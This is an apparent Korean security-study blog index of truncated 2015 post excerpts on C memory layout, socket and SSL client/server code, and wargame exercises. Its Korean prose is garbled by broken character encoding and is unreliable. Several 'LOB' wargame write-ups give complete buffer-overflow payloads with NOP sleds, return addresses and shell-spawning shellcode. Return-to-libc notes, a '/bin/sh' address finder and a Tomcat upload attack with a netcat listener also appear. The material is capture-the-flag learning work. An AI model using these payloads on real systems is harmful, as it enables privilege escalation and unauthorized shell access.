728x90 ๋ฐ์ํ ์ ์ฒด ๊ธ284 memory ์์ญ memory code ์์ญ- ์ฝ๋๋ฅผ ๊ตฌ์ฑํ๋ memory ์์ญ์ผ๋ก hex file or bin fire memory- program ๋ช ๋ น์ด ์์นํ๋ ๊ณณ์ผ๋ก ๊ธฐ๊ณ์ด๋ก ์ ์ด๋๋ ๋ฉ๋ชจ๋ฆฌ ์์ญ์ด๋ค. data ์์ญ- ์ ์ญ๋ณ์, ์ ์ ๋ณ์, ๋ฐฐ์ด, ๊ตฌ์กฐ์ฒด ๋ฑ์ด ์ ์ฅ๋์ด ์๋ค. * ์ด๊ธฐํ ๋ ๋ฐ์ดํฐ๋ data ์์ญ์ ์ ์ฅ๋๊ณ ์ด๊ธฐํ ๋์ง ์์ ๋ฐ์ดํฐ๋ bss(block stated symbol)์ ์ ์ฅ๋๋ค. - ํ๋ก๊ทธ๋จ์ด ์คํ ๋ ๋ ์์ฑ๋์ด ํ๋ก๊ทธ๋จ ์ข ๋ฃ ์ ๊น์ง ์กด์ฌํ๋ค. - ํจ์ ๋ด๋ถ์ ์ ์ธ๋ static ๋ณ์๋ ํ๋ก๊ทธ๋จ์ด ์คํ ๋ ๋ ๊ณต๊ฐ๋ง ํ ๋น๋๊ณ , ํจ์๊ฐ ์คํ ๋ ๋ ์ด๊ธฐํ ๋๋ค. heap ์์ญ- ํ์์ ๋ฐ๋ผ ๋์ ์ผ๋ก ๋ฉ๋ชจ๋ฆฌ๋ฅผ ํ ๋น ํ๊ณ ์ ํ ๋ ์์นํ๋ ๋ฉ๋ชจ๋ฆฌ ์์ญ์ผ๋ก ๋์ ๋ฐ์ดํฐ ์์ญ์ด๋ผ๊ณ ๋ถ๋ฅด๋ฉฐ, ๋ฉ๋ชจ.. Security Study/System 2015. 10. 7. ๋ค๋ค!!! ๋ค๋ค ์ฆ๊ฑฐ์ด ๋ช ์ ๋์๊ณ ์กฐ์ฌํ ๊ณ ํฅ๋ค๋ ์ค์ธ์!!!โ My Story 2015. 9. 25. toolhelp #include #include #include#include#include int _tmain(int argc, _TCHAR* argv[]){ /* */HANDLE hProcess = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); PROCESSENTRY32 process;process.dwSize = sizeof(PROCESSENTRY32); _tprintf(_T("%32s %8s %8s %8s\n"), L"[NAME]", L"[PID]", L"[THREAD]", L"[PPID]"); while (Process32Next(hProcess, &process)){_tprintf(_T("%32s %8d %8d %8d\n"),process.szExeFile, // pr.. Language 2015. 9. 24. C์ธ์ด ์ ๋ฆฌ C์ธ์ด์ ์ฅ์ C์ธ์ด๋ ์ ์ฐจ์งํฅ์ ํน์ฑ์ ์ง๋๋ค. ๋๋ฌธ์ ์ต์ํด์ง๋๋ฐ ์ค๋ ์๊ฐ์ด ๊ฑธ๋ฆฌ์ง ์๋๋ค. ์ฆ, ์ ์ฐจ์งํฅ ํ๋ก๊ทธ๋๋ฐ์์ ์ค์ฌ์ด ๋๋ ๊ฒ์ ‘์์’์ด๋ค.C์ธ์ด๋ก ์์ฑ๋ ํ๋ก๊ทธ๋จ์ ์ด์์ฑ์ด ์ข๋ค.C์ธ์ด๋ก ๊ตฌํ๋ ํ๋ก๊ทธ๋จ์ ์ข์ ์ฑ๋ฅ์ ๋ณด์ธ๋ค. C์ธ์ด๋ ๊ธฐ๋ณธ์ ์ผ๋ก ํจ์๋ก ์์ํด์ ํจ์๋ก ๋๋๋ค.int => ์ถ๋ ฅํํ main => ํจ์์ด๋ฆ (void) => ์ ๋ ฅํํ ์์ int์ void๋ ๊ฐ๊ฐ ์ถ๋ ฅ๊ณผ ์ ๋ ฅ์ ํํ๋ฅผ ์ค๋ช ํ๋ ๊ฒ์ด๋ค. ์ฆ, ์ถ๋ ฅ์ ํํ๊ฐ int ์ด๊ณ ์ ๋ ฅ์ ํํ๊ฐ void์ธ main์ด๋ผ๋ ํจ์ C์ธ์ด์ ํจ์ ๋ด์ ์กด์ฌํ๋ ๋ฌธ์ฅ์ ๋์๋ ์ธ๋ฏธ์ฝ๋ก ๋ฌธ์ ;์ ๋ถ์ฌ์ค๋ค. printf ํจ์๋ ํจ์ํธ์ถ ์ ์ ๋ฌ๋๋ ๋ฌธ์์ด์ ๋ชจ๋ํฐ์ ์ถ๋ ฅํ๋ ๊ธฐ๋ฅ์ ์ง๋๋ค. ์ด๋ ์ง์ ๋ง๋ค์ง ์์๋ ํธ์ถ์ด ๊ฐ๋ฅํ, .. Language 2015. 9. 22. C์ธ์ด์ ๋ฉ๋ชจ๋ฆฌ ๊ตฌ์กฐ ใ ฃ ใ ฃใ ฃ ใ ฃใ กใ กใ กใ กใ กใ กใ กใ กใ ฃ ใ ฃใ ฃ ใ ฃ main ํจ์์ฆ, ๋จผ์ ํธ์ถ ๋ ํจ์์ ์คํ๊ณต๊ฐ ์ผ์๋ก ๋ฆ๊ฒ ํด์ฒด ๋๋ค. free ํจ์๋ฅผ ํธํํ์ง ์์ผ๋ฉด ํ๋ก๊ทธ๋จ ์ข ๋ฃ ํ์๋ ๋ฉ๋ชจ๋ฆฌ๊ฐ ๋จ์๊น?-> ํ๋ก๊ทธ๋จ ์คํ์ ํ ๋น๋ ๋ฉ๋ชจ๋ฆฌ ๊ณต๊ฐ์ ํ๋ก๊ทธ๋จ์ด ์ข ๋ฃ๋๋ฉด ์ด์์ฒด์ ์ ์ํด์ ์ ๋ถ ํด์ ๊ฐ ๋๋ค. ์ ํ์ฒ๋ฆฌ๋?์ปดํ์ผ ์ด์ ์ ์ฒ๋ฆฌ๋ฅผ ์๋ฏธํ๋ค. ๋งคํฌ๋ก ํจ์์ ์ฅ์ - ์ผ๋ฐ ํจ์์ ๋นํด ์๋๊ฐ ๋น ๋ฅด๋ค.- ์๋ฃํ์ ๋ฐ๋ผ์ ๋ณ๋๋ก ํจ์๋ฅผ ์ ์ํ์ง ์์๋ ๋๋ค. ๋งคํฌ๋ก ํจ์์ ๋จ์ - ์ ์ํ๊ธฐ๊ฐ ์ ๋ง๋ก ๊น๋ค๋กญ๋ค.- ๋๋ฒ๊น ํ๊ธฐ๊ฐ ์ฝ์ง ์๋ค. Security Study/System 2015. 9. 21. ssl client #include #include #include #include #include #include #include #include #include #include #define FAIL -1 int OpenConnection(const char *hostname, int port){ int sd; struct hostent *host; struct sockaddr_in addr; if ( (host = gethostbyname(hostname)) == NULL ) { perror(hostname); abort(); } sd = socket(PF_INET, SOCK_STREAM, 0); bzero(&addr, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_port.. Security Study/Network 2015. 9. 18. ssl server #include #include #include #include #include #include #include #include #include #include "openssl/ssl.h"#include "openssl/err.h" #define FAIL -1 int OpenListener(int port){ int sd; struct sockaddr_in addr; sd = socket(PF_INET, SOCK_STREAM, 0); bzero(&addr, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_port = htons(port); addr.sin_addr.s_addr = INADDR_ANY; if ( bind(sd, (struct sockaddr*)&a.. Security Study/Network 2015. 9. 18. echo UDP_client #include #include #include #include #include #include #include #define BUFSIZE 30void error_handling(char *message); int main(int argc, char **argv){int sock;char message[BUFSIZE];int str_len, addr_size; struct sockaddr_in serv_addr;struct sockaddr_in from_addr;int clnt_addr_size; if (argc != 3){printf("Usage : %s \n", argv[0]);exit(1);} sock = socket(PF_INET, SOCK_DGRAM, 0); if (sock == -1)erro.. Security Study/Network 2015. 9. 18. echo UDP_server #include #include #include #include #include #include #include #define BUFSIZE 30void error_handling(char *message); int main(int argc, char **argv){int serv_sock;char message[BUFSIZE];int str_len; struct sockaddr_in serv_addr;struct sockaddr_in clnt_addr;int clnt_addr_size; if(argc!=2){printf("Usage : %s \n", argv[0]);exit(1);} serv_sock=socket(PF_INET,SOCK_DGRAM,0); if(serv_sock ==-1)error_han.. Security Study/Network 2015. 9. 18. echo TCP_client #include #include #include #include #include #include #include #define BUFSIZE 1024void error_handling(char *message); int main(int argc, char **argv){int sock;char message[BUFSIZE];int str_len;struct sockaddr_in serv_addr; if(argc!=3){printf("Usage : %s \n",argv[0]);exit(1);} sock=socket(PF_INET,SOCK_STREAM,0);if(sock==-1)error_handling("socket()error"); memset(&serv_addr,0,sizeof(serv_addr));s.. Security Study/Network 2015. 9. 18. echo TCP_server /*TCP_server*/#include #include #include #include #include #include #define BUFSIZE 1024void error_handling(char *message); int main(int argc, char **argv){ int serv_sock;int clnt_sock;char message[BUFSIZE];int str_len; case 1: struct sockaddr_in serv_addr;struct sockaddr_in clnt_addr;int clnt_addr_size; if(argc!=2){printf("Usage : %s \n",argv[0]);exit(1);} serv_sock=socket(PF_INET,SOCK_STREAM,0.. Security Study/Network 2015. 9. 18. race condition(๊ฒฝ์ ์กฐ๊ฑด)attack ๊ฒฝ์ ์กฐ๊ฑด์ด๋? ๋ ํ๋ก์ธ์ค๊ฐ์ ๋ฆฌ์์ค(resource)๋ฅผ ์ฌ์ฉํ๊ธฐ ์ํด์ ๋คํฌ๋ ๊ณผ์ ์ผ๋ก, ๋ณธ๋ ํดํน๊ธฐ๋ฒ์ ์นญํ๋ ๊ฒ์ด ์๋๋ค. ์๋ ค์ง ์ฝ๋๋ฅผ ํตํด ๊ฒฝ์ ์กฐ๊ฑด์ ์๋ ์๋ฏธ๋ฅผ ์์๋ณด์. ์ฌ๊ธฐ์ fork()๋ผ๋ ํจ์๋ ๋์ผํ ์์ ์ ํ๋ ํ๋ก์ธ์ค๋ฅผ ํ๋ ๋ ๋์ฐ๋ ํจ์๋ก์จ fork()๋ฅผ ํธ์ถํ ๋, ๊ฒฐ๊ณผ ๊ฐ์ ์๋ก ๋ง๋ค์ด์ง ํ๋ก์ธ์ค์ ๋ฒํธ๊ฐ ๋๋ค. ์ด๋ก ํ๋ก์ธ์ค๋ฅผ ๊ตฌ๋ถํ๋ค. if(a%2 ==0) => printf("O")๊ฐ /*๋ถ๋ชจ ํ๋ก์ธ์ค*/์์ 50๋ฒ์ ์ถ๋ ฅํ๊ณ if(a%2 ==1) => printf("X")๊ฐ /*์์ ํ๋ก์ธ์ค*/์์ 50๋ฒ์ ์ถ๋ ฅํ๋ค๊ณ ํ๋ค. ๊ทธ๋ผ ๊ธฐ๋ณธ์ ์ผ๋ก OXOXOXOXOXOXOX์ด๋ฌํ ์์ผ๋ก ์ถ๋ ฅ์ ํ ๊ฒ์ด๋ผ๊ณ ์๊ฐํ๋๋ฐ ์ด์๋ค๋ฅด๊ฒ XXOXXOOOOOOOXXOXOOOOO ์ด๋ฌํ์.. Security Study/System 2015. 9. 17. LOB orge ์ฝ๋๋ฅผ ์ด์ด๋ณด๋ฉด argv[0]=file์ด๋ฆ์ด๋ค. ๊ทธ๋ฌ๋ฏ๋ก ํ์ผ์ด๋ฆ์ 77byte๋ฅผ ๋ง์ถฐ์ฃผ๊ธฐ ์ํด ์ฌ๋ณผ๋ฆญ ๋งํฌ๋ฅผ ๊ฑธ์ด์ค๋ค. ./๊น์ง ํฌํจํ๋ฏ๋ก 75๋ฅผ ํ๋ค.๋๋จธ์ง๋ ๋์ผ ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(์ฌ๋ณผ๋ฆญ ๋งํฌ) $(python -c 'print "\x90"*40+"AAAA"+"\x9c\xfb\xff\xbf(์ฃผ์๊ฐ)"') $(python -c 'print "\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\.. Wargame/CTF(Capture The Flag) 2015. 9. 15. LOB darklf ์์ค๋ฅผ ์ด์ด๋ณด๋ฉด ์ผ๋จ ์ ๋ฌธ์ ๋ ๋น์ทํ๋ฐ ๊ธธ์ด๋ฅผ ์ฒดํฌํ๋ค.์ฒซ๋ฒ์งธ์ธ์ ๊ฐ์ ๊ธธ์ด๋ฅผ ํ์ธํ์ฌ 48๊ธ์๋ณด๋ค ํฌ๋ฉด ๋์๋ฒ๋ฆฌ๋ ๊ฒ์ ํ์ธ ํ ์ ์๋ค. ์ผ๋จ ์๊ณผ ๋๊ฐ์ด ์งํํ๊ณ payload๋ฅผ ์์ฑ๋ ./darkelf $(python -c 'print "\x90"*40+"AAAA"+"\xcc\xfb\xff\xbf"') Wargame/CTF(Capture The Flag) 2015. 9. 15. LOB wolfman ๋ค์ ๋ฌธ์ ๋ฅผ ํ๋ฉด ๋๋ฅ ์ ๋ฌธ์ ๋ ๋๊ฐ์ ํจํด์ด๋ค. ./wolfman $(python -c 'print "\x90"*40+"AAAA(dummy)"+"\xec\xfb\xff\xbf"(์ฃผ์๊ฐ)+"\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"') Wargame/CTF(Capture The Flag) 2015. 9. 15. LOB orc cp๋ช ๋ น์ด ๊ฐ์ ๊ฑด ๋ฌด์ํ๊ณ ๋ค์ ์ ์์ ํ์ฌ ๋ฌธ์ ๋ฅผ ํ๋ฉด orc.c๋ฅผ ์ด์ด๋ณด๋ฉด buffer๊ฐ 40์ด๊ณ ๋ฆฌํด๊ฐ์ด \xbf๊ฐ ๊ผญ ๋ค์ด๊ฐ์ผ ํ๋ค๊ณ ๋์จ๋ค. gdb๋ฅผ ๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ๋ฉ์ธ์ ๋ธ๋ ์ดํฌํฌ์ธํธ๋ฅผ ๊ฑธ๊ณ r $(python -c 'print "\x90"*100์ ์ ๋ ฅํ์ฌ esp๊ฐ์ ๋ฐ๊พธ์๋ค.๊ทธํ x/100 $esp๋ก ๊ฐ์ ํ์ธํ๋ฉด 90909090๋ค์ด๊ฐ ์๋ ์ฃผ์๋ฅผ ๋ณผ์ ์๋ค. payload๋ฅผ ์์ฑํด๋ณด๋ฉด ./orc $(python -c 'print "\x90"*40+"AAAA(dummy)"+"\xdb\xfb\xff\xbf(ret ์ฃผ์๊ฐ)"+"\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68.. Wargame/CTF(Capture The Flag) 2015. 9. 15. LOB goblin ์ ์์ ํ๊ณ (cp ๊ฐ์ ๊ฒ์ ๋ฌด์ํ๊ฒ ์ต๋๋ค) ์์ค๋ฅผ ํ์ธ ํ๋ฉด ์ด๋ฒ์ ๋ํ buffer๊ฐ 16์ธ๊ฒ์ ํ์ธ ํ ์์๋ค.๋จผ์ vi ๋ฅผ ์ด์ฉํ์ฌ ํ๋ก๊ทธ๋๋ฐ GOGO!! ์์๊ฐ์ด #include #include int main(int argc, char *argv[]){long shell;shell = system ์ฃผ์๊ฐ;๋๋จธ์ง๋ ๋์ผ ํ๊ฒ ํ๋ก๊ทธ๋๋ฐ์ ํ๊ณ gcc๋ฅผ ์ด์ฉํด ์ปดํ์ผ์ ํ๋ค. ์ด์ system ์ฃผ์๊ฐ์ ๋ณด๊ธฐ์ํด gdb๋ฅผ ์ด์ฉํด ๋ค์ด๊ฐํ b main๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ๋ฉ์ธ์ ๋ธ๋ ์ดํฌ ํฌ์ธํธ๋ฅผ ๊ฑด๋ค.๊ทธํ p system์ด๋ผ๋ ๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ system ์ฃผ์๊ฐ์ ํ์ธํ๋ค.(ํ๋ก๊ทธ๋๋ฐํ ๋ ์ ๋ ฅํด์ผํจ) ์ด์ payload๋ฅผ ์ง๋ณด๋ฉด (python -c 'print "\x90"*20+"AAAAA(ebp+8.. Wargame/CTF(Capture The Flag) 2015. 9. 15. system /bin/sh ์ฃผ์ ์ฐพ๊ธฐ #include #include int main(int argc,char *argv[]) {long shell;shell = ์์คํ ์ฃผ์;while(memcmp((void*)shell,("/bin/sh"),8)) shell++;printf("%p\n",shell);} Security Study/System 2015. 9. 15. network base 64 = 64์ง์๋ฏธ๋ฆฌ base 64 ์์ธํ๋ฅผ ๊ตฌ์ฑํด์ ธ์์ผ๋ฉฐ 6bit์ฉ ๋๋ ํฌํจํ๋ค.base 64 ๋ ๋์๋ฌธ์๊ฐ ๊ตฌ๋ณ๋์ด์๋ค.๋๋ฉ์ธ ๋ค์์ ์ฌ๋ฌ๊ฐ์ ๋๋ฉ์ธ ๋ผ๋ฒจ๋ก ๊ตฌ์ฑ๋์ด์๋ค. ํฐ๋ ํจํท์ ์ ํจํทethernet+ip+don't care ํฐ๋ ํจํทethernet+ip+udp(53)+dns+encoded payload Security Study/Network 2015. 9. 14. LOB gremlin gate์ ๋ง์ฐฌ๊ฐ์ง๋ก cp๋ช ๋ น์ด๋ฅผ ์คํํ์ฌ ํ์ผ์ ๋ณต์ฌํ๋ค. ๊ทธํ gremlin.c๋ฅผ ์ด์ด ๋ณด๋ฉด 16์ด๋ผ๋ buffer๋ก small buffer๋ผ๋ ๊ฒ์ ์์ ์๋ค.๊ทธํ gdb๋ฅผ ์ด์ฉํ์ฌ ๋ณด๋ฉด sub 0x10์ ๊ฐ์ ํ์ธํด๋ณด๋ฉด 16์ด๋ผ๋ ๊ฒ์ผ๋ก dummy ๊ฐ์ด ์๋ ๊ฒ์ ํ์ธ ํ ์ ์๋ค. 16๋ฐ์ดํธ๋ฅผ ํ๋ณดํ๋ ๊ฒ์ผ๋ก ๋ณด์ด๋ฏ๋ก main+3์ ๋ธ๋ ์ดํฌ ํฌ์ธํธ๋ฅผ ๊ฑด๋ค. ๊ทธ๋ฆฌ๊ณ ํ๋ก๊ทธ๋จ ์คํ ๋์์ ์ธ์๊ฐ ์ ๋ฌ๋๋ฏ๋ก argv[2]์ ์์น๋ฅผ ์์๋ณด๊ธฐ์ํด $(python -c 'print "\x90(buffer+sfp๊ฐ)"*20+"BBBB(ret์ ๋ฎ์ด์จ์ผํ ์ฃผ์ ๊ฐ๋ค์ด๊ฐ ์์น"') $(python -c 'print "A"*241"")์ ๋ฃ๋๋ค 0x42424242๊ฐ ret์์น๋ก ๋ฎ์ด์จ์ผํ๋ฏ๋ก ๋์ถฉ 414141414.. Wargame/CTF(Capture The Flag) 2015. 9. 14. LOB gate LOB gate๋ก ์ ์์ ํ๋ฉด gate์ gate๋ก ์ ์๊ฐ๋ฅํ๋ค. ์ ์ํ ํ์ธ ํ๋ฉด ํ์ผ์ด 3๊ฐ์๋ ๊ฒ์ด ํ์ธ๊ฐ๋ฅ ํ๋ค ๋จผ์ cp ๋ช ๋ น์ ์ด์ฉํ์ฌ gremlin์ ๊ถํ์ด ์์ด gdb ๋ ๋ชปํ๋ ๋ฌธ์ ๋ฅผ ํด๊ฒฐํ์ !cp๋ช ๋ น์ด๋ ํ์ผ์ ๋ณต์ฌํ๋ ๋ช ๋ น์ด์ด๋ค. ํ์ผ์ ๋ณต์ฌํ๊ณ gremlin.c ๋ฅผ ์ด์ด๋ณด๋ฉด strcpy์์ ๋ฌธ์ ๊ฐ ๋ฐ์ํ๋ ๊ฒ์ ๋ณผ์ ์๋ค.ํ์ด๋ก๋๋ฅผ ์๊ฐ ํด๋ณด๋ฉด ์ผ๋จ buffer 260(256+sfp)+shellcode+ret์ฃผ์(buffer์ฃผ์)๋ฅผ ๋ฃ์ด์ผํ๋ค. gdb๋ก ํ์ธ์ ํด๋ณด๋ฉด strcpy๋ค์์์ ์ผ์ด๋๋ b *main+59์ ๋ธ๋ ์ดํฌ ํฌ์ธํธ๋ฅผ ๊ฑธ๊ณ r $(python -c 'print "\x90"*200(์์์ ๊ฐ)')์ ๋ฃ๊ณ x/100x $esp ๋ก esp๊ฐ์ ํ์ธ ํ๋ฉด 0x9090909.. Wargame/CTF(Capture The Flag) 2015. 9. 14. system 2 gdb์์์์ blocking ํจ์ ์ ๋ ฅ r Security Study/System 2015. 9. 13. system 1์ผ์ฐจ buf[248] + sfp[4] + ret ulimit -s unlimited //์คํํฌ๊ธฐ๋ฅผ ๋ฌดํ์ ์ผ๋ก ๋๋ ค ASLR์ด ์ ์ฉ์๋จ system,execve - ebp+8์์น์์๋๊ฒ์ ์ธ์๋ก๋ฐ์ buf[248] + sfp [4] + ์กฐ์(system) + AAAA + /bin/sh - system("/bin/sh") b main r 1 p system - system์ฃผ์ ๊ตฌํ๊ธฐ p exit - exit๊ตฌํ๊ธฐ find &system,+9999999,"/bin/sh" - /bin/sh์ฃผ์ ๊ตฌํ๊ธฐ ./filename $(python -c 'print "A"*๋ฒํผ+sfp + system + exit + /bin/sh strcpy(bss,\x80asda) strcpy(bss,"b") ./filename buf+sfp.. Security Study/System 2015. 9. 12. ๋ชจ์ํดํน์ด๋ ๋ฌด์์ธ๊ฐ? ์ ์์์ ๋ง๋จ title : ์ต์ฐ ๋ํฅ ํ์ ์ ํตํ ๊ณต๊ฒฉ๊ธฐ๋ฒ ์ดํด ---------------------------------------------------------------------------------------------- ์ต์ ์ทจ์ฝ์ ๋ฏธํจ์น?os, ์ดํ๋ฆฌ์ผ์ด์ ๋ฑ์์ ๋ฐ๊ฒฌ๋๊ณ ์๋ ์ทจ์ฝ์ ์ ์ฃผ๊ธฐ์ ์ ํจ์นํ์ง ์์์ผ๋ก์จ, ์์คํ ๋ฐ ๊ฐ์ธ PC์ ์ฌ๊ฐํ ์ํฅ์ ์ค์ ์๋ ์ทจ์ฝ์ ๋ชจ์ ํดํน์ ํ๋ค๋ณด๋ฉด web์ ์ค์ ์ ๋์ ๋ฐ์ ์๋ค. 1) ์ทจ์ฝ์ ๊ณต๊ฒฉ์ฌ๋ก1-1)tomcat๊ด๋ฆฌ์ ํ์ด์ง ์ทจ์ฝ์ (8180 metasplotable) => ์ถ์ธก ๊ณต๊ฒฉ(๋ชจ๋ ๋ต์ page์์)war file -> jar cvf test.war .file upload ์ทจ์ฝ์ uploadํ๊ณ ์ปค๋งจ๋ ์ฐฝ์ ์ฐ๋ค.nc -lvp 12345 ๋ฅผ .. My Story 2015. 9. 11. windows 10 (microsoft) ๊ณผ๊ฑฐ - ์ฌ๋์ด ์ปดํจํฐ์๋ ๊ณณ์ผ๋ก ์ฐพ์๋ค๋ํ์ฌ - ์ฌ๋์ผ๋ก ๋ถํฐ ๊ฐ์ฅ ๊ฐ๊น์ด ์๋ ์ฅ์น๋ก ์ธํ์ฌ ์ฌ์ฉํ๊ณ ๊บผ๋ฒ๋ฆผ(์๋นํ๋ ๊ฐ๋ ) windows 7 - ๋ง์ฐ์ค์ ํค๋ณด๋์ ์ ์ํ์ฌ windows 8์ด ๋์์ ๋ ์ ์ํ๊ธฐ๊ฐ ํ๋ฌwindows 8 - start button, shutdown button ๋๊ฐ์ง์ ๋ฌธ์ ์ ์ด ๋ฐ์ windows 10 - ๋๊ฐ์ง์ ๋ฌธ์ ์ ์ ํ๋ฒ์ ํด๊ฒฐwindows 10 - 10๋ถํฐ๋ computer ๋ฟ๋ง์๋๋ผ phone์์๋ ์ฌ์ฉ ๊ฐ๋ฅ(์ฑ ํธํ) windows 10 - music, camera, media, mail, edge(internet browser)windows 10 - mobility, more personal, more productivity, one more thing .. My Story 2015. 9. 10. ์ด์ 1 ยทยทยท 7 8 9 10 11 12 ๋ค์ 728x90 ๋ฐ์ํ